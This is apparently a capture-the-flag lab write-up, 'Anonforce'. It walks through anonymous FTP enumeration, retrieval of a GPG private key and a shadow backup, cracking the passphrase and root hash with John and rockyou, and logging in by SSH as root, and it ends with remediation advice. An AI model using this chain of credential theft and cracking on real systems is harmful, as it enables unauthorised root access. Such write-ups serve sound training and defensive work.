Anonymous FTP, GPG key crack, and root shadow reuse
Foundations Linux engagement: anonymous FTP exposed a GPG private key and encrypted shadow backup; cracked passphrase and root hash yielded direct SSH as root.
- Case files
- Anonymous FTP, GPG key crack, and root shadow reuse
Anonymous FTP leaked cryptographic material. Offline GPG and hash cracking recovered the root password without needing a low-privilege interactive foothold.
Anonymous login retrieved user.txt, backup.pgp, and private.asc.
John cracked xbox360; gpg decrypted the backup containing root’s hash.
John cracked hikari; SSH as root completed the case.
Engagement summary
Anonymous FTP leaked cryptographic material. Offline GPG and hash cracking recovered the root password without needing a low-privilege interactive foothold.
ANONFORCE exposed vsftpd with anonymous access and OpenSSH. FTP served the user artifact under melodias/ plus /notread containing backup.pgp and private.asc. gpg2john and John recovered passphrase xbox360; decrypting the backup revealed root’s $6$ hash. rockyou cracked hikari; SSH as root completed the engagement.
Business impact
Anonymous FTP that hosts private keys and shadow backups is a full compromise waiting for offline cracking. Disable anonymous FTP, never back up /etc/shadow to world-readable shares, and enforce strong GPG passphrases and root passwords.
Anonymous FTP enumeration
Anonymous login retrieved user.txt, backup.pgp, and private.asc.
OPERATOR · FTP
savvy@lab:~$ nmap -sC -sV 10.201.18.12
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2
savvy@lab:~$ ftp 10.201.18.12
Name: anonymous
ftp> get user.txt
ftp> cd notread
ftp> get backup.pgp
ftp> get private.asc
GPG passphrase and shadow decrypt
John cracked xbox360; gpg decrypted the backup containing root’s hash.
OPERATOR · GPG
savvy@lab:~$ gpg2john private.asc > privatex
savvy@lab:~$ john privatex --wordlist=/usr/share/wordlists/rockyou.txt
xbox360 (private.asc)
savvy@lab:~$ gpg --import private.asc && gpg --decrypt backup.pgp
root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a...
Root hash crack and SSH
John cracked hikari; SSH as root completed the case.
OPERATOR · ROOT
savvy@lab:~$ john hash -w=/usr/share/wordlists/rockyou.txt
hikari (root)
savvy@lab:~$ ssh root@10.201.18.12
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Disable anonymous FTP; encrypt backups with unique strong secrets offline. Use SSH keys for root or disable password auth entirely.